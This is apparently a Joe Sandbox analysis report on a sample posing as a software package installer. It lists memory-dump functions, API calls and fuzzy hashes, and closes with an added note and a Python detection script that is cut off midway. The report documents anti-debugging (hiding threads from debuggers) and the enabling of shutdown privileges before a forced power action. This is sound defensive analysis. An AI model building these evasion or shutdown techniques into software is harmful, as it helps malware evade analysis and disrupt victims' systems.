                        • Opcode Fuzzy Hash: 27e05e697439aea44b8f0d9db73c416200fa61c6b67fe42c2ad4a1a33378a5e0
                        • Instruction Fuzzy Hash: 5951CF316447018FC3308F28C984795B7A3AFDA314F698E5DC0AA5BAA5DB74B94A8B41
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: 385b30ec324be3640736d8f78b9ec0b5552eb9b64d8085f045dcaced8c4d9f74
                        • Instruction ID: 7f2dcb840583cd90303bd0e16b70a301a3ca34d8e28d3280112699167d5cfdfd
                        • Opcode Fuzzy Hash: 385b30ec324be3640736d8f78b9ec0b5552eb9b64d8085f045dcaced8c4d9f74
                        • Instruction Fuzzy Hash: 0B51D131504B118BC330CF28C580795B7A3BFDA314F698E5DC0EA5BAA5DB70BD4A8B91
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 6C8E3E9D
                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C8E3EAA
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: Thread$CurrentInformation
                        • String ID:
                        • API String ID: 1650627709-0
                        • Opcode ID: fa962042944d9f9b2fecbe7c05dfff6d424e5ef20e9e8732585b1bda32f3482e
                        • Instruction ID: 7dc9c89aa7d44e7c61c774842e51d3c1df9760176395f5ef9be5e28545b25dde
                        • Opcode Fuzzy Hash: fa962042944d9f9b2fecbe7c05dfff6d424e5ef20e9e8732585b1bda32f3482e
                        • Instruction Fuzzy Hash: 41312031605B058BD730CF68C9947C6B7A2AFDA314F298E1CC0AA5BA90DB7478098B51
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 6C8E3E9D
                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C8E3EAA
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: Thread$CurrentInformation
                        • String ID:
                        • API String ID: 1650627709-0
                        • Opcode ID: 365c34810e4b73118ac95218dc8a1a0a4f4d8c8a33955432983f3283c1b69468
                        • Instruction ID: 2cece8ada5d79f6bd8b27793f3bdd7128046367c62c502c48e47873c8fd92764
                        • Opcode Fuzzy Hash: 365c34810e4b73118ac95218dc8a1a0a4f4d8c8a33955432983f3283c1b69468
                        • Instruction Fuzzy Hash: 4B312331104705CBD734CF68C594796B7B2AF9B304F294E5CC0EA5BA91DB71B849CB52
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 6C8E3E9D
                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C8E3EAA
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: Thread$CurrentInformation
                        • String ID:
                        • API String ID: 1650627709-0
                        • Opcode ID: 443e47deb56817339440dbedf036c5de8a1fd89ce6a369f4c540c41b8154cdcc
                        • Instruction ID: 5c37a64ba6db5014913738e65ecaae86c3ac65a2074f94d4afce639650036a0f
                        • Opcode Fuzzy Hash: 443e47deb56817339440dbedf036c5de8a1fd89ce6a369f4c540c41b8154cdcc
                        • Instruction Fuzzy Hash: 7621F730618705CBD734CF64C99479677B2AF8B305F544E6DC0AA87A90DB74AD088B52
                        APIs
                        • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CA63F40
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ManagerOpen
                        • String ID:
                        • API String ID: 1889721586-0
                        • Opcode ID: 7de2fb860ac89956437c6379ceacb23762b9f84c5a87142c833709a1950458b8
                        • Instruction ID: 5be8328ef8c4bbb6dc69e5c7f823bcd8f6f80168a137b133aff3ead7cc986875
                        • Opcode Fuzzy Hash: 7de2fb860ac89956437c6379ceacb23762b9f84c5a87142c833709a1950458b8
                        • Instruction Fuzzy Hash: 4C311874609342AFD700CF2AC888A1ABBF1AF85754F14885DF4D9CB6A1C375D885CB63
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: "OP$#OP$#OP$+duH$+duH$/+p8$/+p8$H$J\$J\$P$Rr!A$Sr!A$Sr!A$p

                        Control-flow Graph
                        • Graph image for the function at 6ca7b8f3 (calls ReadFile, GetConsoleMode, ReadConsoleW and GetLastError); node and edge listing omitted.
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID: 8Q

                        Control-flow Graph
                        • Graph image for the function at 6ca82e8c (calls GetFileType, GetLastError and CloseHandle, with CreateFileW in a subcall); node and edge listing omitted.
                        APIs
                          • Part of subcall function 6CA83277: CreateFileW.KERNEL32(00000000,00000000,?,6CA82F35,?,?,00000000,?,6CA82F35,00000000,0000000C), ref: 6CA83294
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA82FA0
                        • __dosmaperr.LIBCMT ref: 6CA82FA7
                        • GetFileType.KERNEL32(00000000), ref: 6CA82FB3
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA82FBD
                        • __dosmaperr.LIBCMT ref: 6CA82FC6
                        • CloseHandle.KERNEL32(00000000), ref: 6CA82FE6
                        • CloseHandle.KERNEL32(6CA79EF0), ref: 6CA83133
                        • GetLastError.KERNEL32 ref: 6CA83165
                        • __dosmaperr.LIBCMT ref: 6CA8316C
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        Similarity
                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                        • String ID: 8Q

                        Control-flow Graph
                        • Graph image for the function at 6ca3b750 (calls CreateFileA); node and edge listing omitted.
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID: 1:x$1:x$wtU'$xtU'$xtU'
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID: ;T55

                        Control-flow Graph
                        • Graph image for the function at 6ca63e00 (calls CreateProcessA, WaitForSingleObject and CloseHandle); node and edge listing omitted.
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        Similarity
                        • API ID: CloseHandle$CreateObjectProcessSingleWait
                        • String ID: D

                        Control-flow Graph
                        • Graph image for the function at 6ca7aa7e (calls WriteFile and GetLastError); node and edge listing omitted.
                        APIs
                          • Part of subcall function 6CA7ACD1: GetConsoleCP.KERNEL32(?,6CA79EF0,?), ref: 6CA7AD19
                        • WriteFile.KERNEL32(?,?,6CA8350C,00000000,00000000,?,00000000,00000000,6CA848D6,00000000,00000000,?,00000000,6CA79EF0,6CA8350C,00000000), ref: 6CA7ABCF
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CA8350C,6CA79EF0,00000000,?,?,?,?,00000000,?), ref: 6CA7ABD9
                        • __dosmaperr.LIBCMT ref: 6CA7AC1E
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        Similarity
                        • API ID: ConsoleErrorFileLastWrite__dosmaperr
                        • String ID: 8Q

                        Control-flow Graph
                        • Graph image for the function at 6ca649b0 (internal calls only, no Win32 API nodes); node and edge listing omitted.
                        APIs
                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA64B51
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        Similarity
                        • API ID: Ios_base_dtorstd::ios_base::_
                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set

                        Control-flow Graph
                        • Graph image for the function at 6ca3c310 (calls ReadFile and WriteFile); node and edge listing omitted.
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:

                        Control-flow Graph
                        • Graph image for the function at 6ca7a745 (calls CloseHandle and GetLastError); node and edge listing omitted.
                        APIs
                        • CloseHandle.KERNEL32(00000000,?,00000000,?,6CA8307F), ref: 6CA7A79B
                        • GetLastError.KERNEL32(?,00000000,?,6CA8307F), ref: 6CA7A7A5
                        • __dosmaperr.LIBCMT ref: 6CA7A7D0
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: CloseErrorHandleLast__dosmaperr
                        • String ID:
                        • API String ID: 2583163307-0
                        • Opcode ID: 0ee5219624bffe0a20007ae3084c4ceba3f8d52fbfccad6493e3c744971180da
                        • Instruction ID: df011e572a7788d198afe8145bd779d354372aabcd6291a7d9ea8f5bccee7b1a
                        • Opcode Fuzzy Hash: 0ee5219624bffe0a20007ae3084c4ceba3f8d52fbfccad6493e3c744971180da
                        • Instruction Fuzzy Hash: 5D014C3670715027C124063994847AD2776AB8373CF2D5319E514D7AC2DF28CCC951A0
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: 8Q
                        • API String ID: 0-4022487301
                        • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                        • Instruction ID: e8a0bd02f984a47ebd13ee455355f836d5182b93ea432f45bbedb7205fac21eb
                        • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                        • Instruction Fuzzy Hash: A9F0F4366126186ACA315A7FCE007CA33A99F5233DF290719E86597FC0DB70D48E86F1
                        APIs
                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA648D4
                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA64914
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: Ios_base_dtorstd::ios_base::_
                        • String ID:
                        • API String ID: 323602529-0
                        • Opcode ID: 61fe2cf4e8508e94ec9a661aafa8874b60c214ed7789f2cf4ee7e582c7802a1e
                        • Instruction ID: 91185e6c46ad1a0630debde7e31336c17afdf89e517b9fe029299abc0f33a038
                        • Opcode Fuzzy Hash: 61fe2cf4e8508e94ec9a661aafa8874b60c214ed7789f2cf4ee7e582c7802a1e
                        • Instruction Fuzzy Hash: 3E512771205B40DBE725CF25C994BD6BBF4BB05718F448A1CE4AA4BB91D730F589CB80
                        APIs
                        • GetLastError.KERNEL32(6CA94DD8,0000000C), ref: 6CA6DD72
                        • ExitThread.KERNEL32 ref: 6CA6DD79
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ErrorExitLastThread
                        • String ID:
                        • API String ID: 1611280651-0
                        • Opcode ID: e247a26a75645dab3399d39afaa198afee069d8a775906b282398aa830a9460a
                        • Instruction ID: efae2be3f887849e7bfb7100b48282d15b3461de0cad795bd2b5251b2efe8937
                        • Opcode Fuzzy Hash: e247a26a75645dab3399d39afaa198afee069d8a775906b282398aa830a9460a
                        • Instruction Fuzzy Hash: 79F0F6B4A10604AFDF15AFB1C509AAE3B74FF45314F284249E00197F90CF34698ACFA0
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: __wsopen_s
                        • String ID:
                        • API String ID: 3347428461-0
                        • Opcode ID: 35cf1cbc4f3ad3a060de5f0d37ba0f8567ad9fd66e7adec6b5d725cfba2dc13e
                        • Instruction ID: c3b957fd08976a929b1141a848bcfead031751bfbaf8c26715bf652aae7a589f
                        • Opcode Fuzzy Hash: 35cf1cbc4f3ad3a060de5f0d37ba0f8567ad9fd66e7adec6b5d725cfba2dc13e
                        • Instruction Fuzzy Hash: B2116A75A0420AAFCF09CF58EA4499F3BF8EF48308F04406AF804AB301D630E915CBA4
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                        • Instruction ID: c85752414efcda7aac81ad6647c80c492290f93dd17fd897f0aa8a0f0ba95a72
                        • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                        • Instruction Fuzzy Hash: 55014F72C01159BFCF019FA88D04AEE7FB5AF08314F144265F964E2650E7318AA9DB95
                        APIs
                        • CreateFileW.KERNEL32(00000000,00000000,?,6CA82F35,?,?,00000000,?,6CA82F35,00000000,0000000C), ref: 6CA83294
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 09421729f6445c3e2e6b549a26bd8f03895efeed75c3121d9557d1e62c6927f2
                        • Instruction ID: 13fa74f71d5c3a9ef607775192dbb8b8e60a66bc0c01d86dc6cdeb3d01495972
                        • Opcode Fuzzy Hash: 09421729f6445c3e2e6b549a26bd8f03895efeed75c3121d9557d1e62c6927f2
                        • Instruction Fuzzy Hash: 61D06C3211020EBBDF028E84DC06EDA3BAAFB48714F018100BA1856020C732E862AB90
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                        • Instruction ID: 3d0b8eeacd6939b96bfadade53b255ded7a94c0974d40c58c017d80fe10c3741
                        • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                        • Instruction Fuzzy Hash:
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 6CA64B8A
                        • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CA64B96
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CA64BA4
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CA64BCB
                        • NtInitiatePowerAction.NTDLL ref: 6CA64BDF
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                        • String ID: SeShutdownPrivilege
                        • API String ID: 3256374457-3733053543
                        • Opcode ID: f129f931ec93754daa18a7fbaaa5fd3dce2fd3c7452bbb061734078d283a328a
                        • Instruction ID: f6177b99b93c218db9010fb60d0bca7d5fca221b9ba51ced8bd00cd1f13b0e2f
                        • Opcode Fuzzy Hash: f129f931ec93754daa18a7fbaaa5fd3dce2fd3c7452bbb061734078d283a328a
                        • Instruction Fuzzy Hash: A3F054B4645300AFFA106F24DD0EB6A7BB4FF45701F004518F985A71D1E7B06994CBA3
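The API sequence listed for this function (GetCurrentProcess, OpenProcessToken with access mask 00000028, LookupPrivilegeValueW for SeShutdownPrivilege, AdjustTokenPrivileges, NtInitiatePowerAction) is the standard way a process enables a privilege in its own token before calling a shutdown-capable native API; 0x28 decodes to TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES. The Python below is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses "APIs" lines in the format used on this page, decodes the token access mask, and flags the open-token / lookup-privilege / adjust / consume chain. It also recognises the IsDebuggerPresent, SetUnhandledExceptionFilter(0), UnhandledExceptionFilter triple that appears later on this page, which is the same sequence the MSVC CRT's fault-reporting code uses and so, on its own, is weak evidence of deliberate anti-debugging. The sample lines are copied from this listing; the set of shutdown "sink" APIs and the winnt.h token constants are the example's own assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample input: "APIs" entries copied from this report's listing
# (the SeShutdownPrivilege routine and the IsDebuggerPresent routine). The
# indented "Part of subcall function" line is included to show it is skipped.
SAMPLE_LISTING = """\
• GetCurrentProcess.KERNEL32 ref: 6CA64B8A
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CA64B96
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CA64BA4
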